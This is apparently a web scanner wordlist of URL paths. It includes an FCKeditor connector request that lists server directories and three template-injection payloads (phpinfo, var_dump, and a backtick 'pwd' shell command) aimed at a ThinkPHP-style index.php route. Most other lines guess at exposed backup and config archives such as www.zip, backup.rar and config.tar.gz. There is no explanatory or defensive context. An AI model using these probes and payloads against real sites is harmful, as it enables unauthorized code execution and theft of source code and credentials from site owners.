/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=d:/
/ckfinder/ckfinder.html
/index.php?s=/Index/Index/home/id/{${phpinfo()}}
/index.php?s=/Index/Index/home/id/${@var_dump(c())}
/index.php?s=/Index/Index/home/id/${@print(`pwd`)}
/www.rar
/www.zip
/www.tar.gz
/%domain%.rar
/%domain%.tar
/%domain%.zip
/%domain%.tar.gz
/%domainCenter%.rar
/%domainCenter%.tar
/%domainCenter%.zip
/%domainCenter%.tar.gz
/web.rar
/web.zip
/web.tar.gz
/backup.rar
/backup.zip
/backup.tar.gz
/wwwroot.rar
/wwwroot.tar.gz
/wwwroot.zip
/config.rar
/config.tar.gz
/config.zip
